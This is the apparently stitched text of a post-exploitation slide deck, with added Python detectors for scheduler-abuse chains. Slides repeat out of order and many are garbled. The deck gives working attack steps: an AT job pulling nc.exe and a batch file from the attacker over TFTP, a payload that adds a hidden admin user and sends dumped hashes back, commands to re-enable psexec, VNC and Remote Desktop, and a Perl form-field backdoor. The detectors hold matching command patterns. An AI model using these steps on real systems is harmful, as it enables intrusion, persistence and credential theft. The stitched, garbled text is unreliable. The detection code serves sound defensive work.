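            if later["host"] != ev["host"]:
                continue
            if not (ev["time"] <= later["time"] <= ev["time"] + window):
                continue
            if later.get("id") in USER_CREATED | GROUP_MEMBER_ADDED:
                alerts.append({"host": ev["host"], "time": later["time"].isoformat(),
                               "reason": (f"account change (event {later['id']}: "
                                          f"{later['detail']}) within {window} of "
                                          f"scheduled task '{detail}'")})
    return alerts


# Constructed log: the slide's sequence on WS01, plus benign activity elsewhere.
SAMPLE_LOG = """
2008-08-06T11:58:00 host=WS01 id=602 actor=SYSTEM detail="tftp -i 10.0.0.5 GET e.bat"
2008-08-06T11:59:00 host=WS01 id=602 actor=SYSTEM detail="e.bat"
2008-08-06T11:59:40 host=WS01 id=624 actor=SYSTEM detail="hacked"
2008-08-06T11:59:41 host=WS01 id=636 actor=SYSTEM detail="Administrators += hacked"
2008-08-06T13:00:00 host=SRV02 id=602 actor=backup_svc detail="backup.exe /nightly"
2008-08-06T15:00:00 host=WS03 id=624 actor=helpdesk detail="newhire"
""".strip().splitlines()

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(f"{alert['time']} {alert['host']}: {alert['reason']}")
```

The nightly backup job on SRV02 and the helpdesk account creation on WS03 produce nothing; only WS01 is reported, once for the TFTP command line and once per account event that follows each job. Slide 59's "defaults to run as SYSTEM" is what makes the actor field worth a second rule in practice: a user created by SYSTEM rather than by an administrator is itself an anomaly.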
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish netbios session / credentials on a range of hosts
• MassWinenum – Enumerate Netbios information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
  – Thanks to
    • All the people from offensivecomputing, nologin, uninformed IRC and SILC channels
    • HD Moore especially for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
Slide 2
Valsmithndash Affiliations
bull Offensive Computingbull Metasploitbull cDc
ndash Workbull Malware Analystbull Reverse Engineerbull Penetration Testerbull Exploit developer
Slide 3
Colin Amesndash Security Researcher Offensive Computingndash Steganography Researchndash Penetration Testingndash Reverse Engineeringndash Malware Analysis
Slide 4
bull What is thisndash Follow up to Valrsquos and HD Moorersquos
Tactical Exploitation talk from last yearndash A talk about the use of automation
and tactical tools post-exploitationndash Applied techniques ndash Good for LARGE environmentsndash Different perspectives some old
some forgotten some new
Slide 5
Post Exploitation Concepts Overview
Slide 6
What Is Post Exploitation
bull Itrsquos what you do after you get rootndash Note This talk assumes you have access
bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage
Slide 7
What Is Post Exploitation
bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along
bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone
bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – The Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

Net use \\target\ipc$ password /user:username
At \\target 12:00 pm command
Ex: At \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – Flow
  • Establish authenticated session
  • Determine the time on the target
  • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
  – Net use \\target
  – Net time \\target
  – At \\target (net time + 1 min) "tftp -i use GET e.bat"
  – At \\target (net time + 2 min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hashdumping tools and dumps hashes
    • Sends hashes, identified by IP, back to the attacker host
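The chain above is what the target host sees as a burst of SYSTEM-context commands; a detection over process-creation records, added here as an example and not the authors' AtAbuse tool, correlates the slide's own indicators per host. The record fields, indicator weights and sample records are all constructed.

```python
"""Detect the e.bat scheduler-abuse chain from slides 58-61 in process-creation
records on the target host (Security event 4688 with command-line auditing, or
Sysmon event 1, normalised to dicts).

Added example for this page, not the authors' AtAbuse tool. The record fields
(host, time, user, cmdline), the indicator weights and the sample records are
all constructed here.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SYSTEM_USER = "nt authority\\system"  # AT jobs default to run as SYSTEM (slide 59)
WINDOW = timedelta(minutes=10)         # the jobs are scheduled 1-2 minutes apart
THRESHOLD = 4                          # needs two distinct indicators in one window

# Indicators lifted from the e.bat payload on slide 61 and the hash-dumping
# tools named on slide 11: (name, pattern, weight).
INDICATORS = [
    ("tftp_pull", re.compile(r"\btftp(\.exe)?\b.*\s-i\b.*\bget\b", re.I), 2),
    ("user_add", re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I), 2),
    ("admin_add", re.compile(
        r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I), 3),
    ("hash_dump", re.compile(r"\b(pwdump\w*|cachedump)(\.exe)?\b", re.I), 3),
]

# Constructed sample records: ws01 sees the slide-61 job run as SYSTEM; srv02
# sees a benign SYSTEM backup job and a helpdesk user adding an account.
SAMPLE_EVENTS = [
    {"host": "ws01", "time": "2008-08-01 11:59:01", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "tftp -i 10.0.0.5 GET e.bat"},
    {"host": "ws01", "time": "2008-08-01 12:00:01", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "cmd /c e.bat"},
    {"host": "ws01", "time": "2008-08-01 12:00:02", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "net user hacked hacked /add"},
    {"host": "ws01", "time": "2008-08-01 12:00:03", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "net localgroup administrators hacked /add"},
    {"host": "ws01", "time": "2008-08-01 12:00:10", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "pwdump.exe localhost"},
    {"host": "srv02", "time": "2008-08-01 23:30:00", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "cmd /c C:\\scripts\\backup.cmd"},
    {"host": "srv02", "time": "2008-08-01 09:15:00", "user": "CORP\\helpdesk",
     "cmdline": "net user newhire P@ss1 /add"},
]


def match_indicators(cmdline):
    """Return the (name, weight) pairs whose pattern matches the command line."""
    return [(name, w) for name, rx, w in INDICATORS if rx.search(cmdline)]


def detect_scheduler_abuse(events, window=WINDOW, threshold=THRESHOLD):
    """Correlate SYSTEM-context indicator hits per host within a time window.

    A window opens at the first hit on a host and closes after `window`; an
    alert is raised when the distinct indicators in it reach `threshold`.
    """
    hits_by_host = defaultdict(list)
    for ev in events:
        if ev["user"].lower() != SYSTEM_USER:
            continue
        hits = match_indicators(ev["cmdline"])
        if hits:
            ts = datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")
            hits_by_host[ev["host"]].append((ts, hits))

    alerts = []

    def close(host, start, seen):
        score = sum(seen.values())
        if score >= threshold:
            alerts.append({"host": host, "first_seen": start.isoformat(sep=" "),
                           "indicators": sorted(seen), "score": score})

    for host, items in hits_by_host.items():
        items.sort(key=lambda x: x[0])
        start, seen = None, {}
        for ts, hits in items:
            if start is not None and ts - start > window:
                close(host, start, seen)
                start, seen = None, {}
            if start is None:
                start = ts
            for name, w in hits:
                seen.setdefault(name, w)  # count each indicator once per window
        if start is not None:
            close(host, start, seen)
    return alerts


if __name__ == "__main__":
    for alert in detect_scheduler_abuse(SAMPLE_EVENTS):
        print(alert)
```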
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish netbios session credentials on a range of hosts
• MassWinenum – Enumerate Netbios information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
  – Thanks to:
    • All the people from offensivecomputing, nologin, uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
Slide 4
bull What is thisndash Follow up to Valrsquos and HD Moorersquos
Tactical Exploitation talk from last yearndash A talk about the use of automation
and tactical tools post-exploitationndash Applied techniques ndash Good for LARGE environmentsndash Different perspectives some old
some forgotten some new
Slide 5
Post Exploitation Concepts Overview
Slide 6
What Is Post Exploitation
bull Itrsquos what you do after you get rootndash Note This talk assumes you have access
bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage
Slide 7
What Is Post Exploitation
bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along
bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone
bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)
Slide 8
Password Management
Slide 9
Why Password Management
ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many
systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets
you crack fasterndash Aids in cleanup stage
bull Tying accounts to systems
Slide 10
Password Management Goals
ndash Acquired password storage ndash Organization and tracking
bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what
resourcesndash Re-use for further accessndash Expanding wordlist for faster
cracking
Slide 11
Password Management Stages amp Techniques
ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing
ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
– PsExec: it's still cool (Thanks Mark)
• Enabling GUI access
– VNC (from a command line)
– Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
– Firewalls, AV, logging
• Modifying Local Security Policies
Slide 49
Feature Modification
• Enabling psexec
– Psexec was a great, awesome remote shell/command tool
– Everybody now disables clipbook, which psexec requires (l4m3)
– Let's re-enable it
Slide 50
Feature Modification
• Enabling psexec
• Use the service control tool, sc.exe
– net use \\target\ipc$ /user:username userpassword
– sc \\target config netdde start= auto
– sc \\target config netddedsdm start= auto
– sc \\target config clipsrv start= auto
– sc \\target start netdde
– sc \\target start netddedsdm
– sc \\target start clipsrv
Slide 51
Feature Modification
• Enabling VNC (from command line)
– Go get VNC (check out guhnu)
– Make a folder on the target for the VNC files
– Copy the following files to the target folder
• winvnc.exe
• vnc.reg
• vnchooks.dll
• omnithread_rt.dll
– regedit -s vnc.reg
– winvnc -install
– net start "vnc server"
– winvnc
– Password is "infected"
vnc.reg file contents:
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app
• Ex: system controlling access to security doors
– No command-line way of modifying the system, need GUI
• SCADA systems
• Security cameras
• Who knows what you might be up to
– Remote Desktop is fast and already a feature of the OS
– However, it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
– Complicated procedure, especially if GPOs are involved
– Create a file named fix_ts_policy.ini:
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
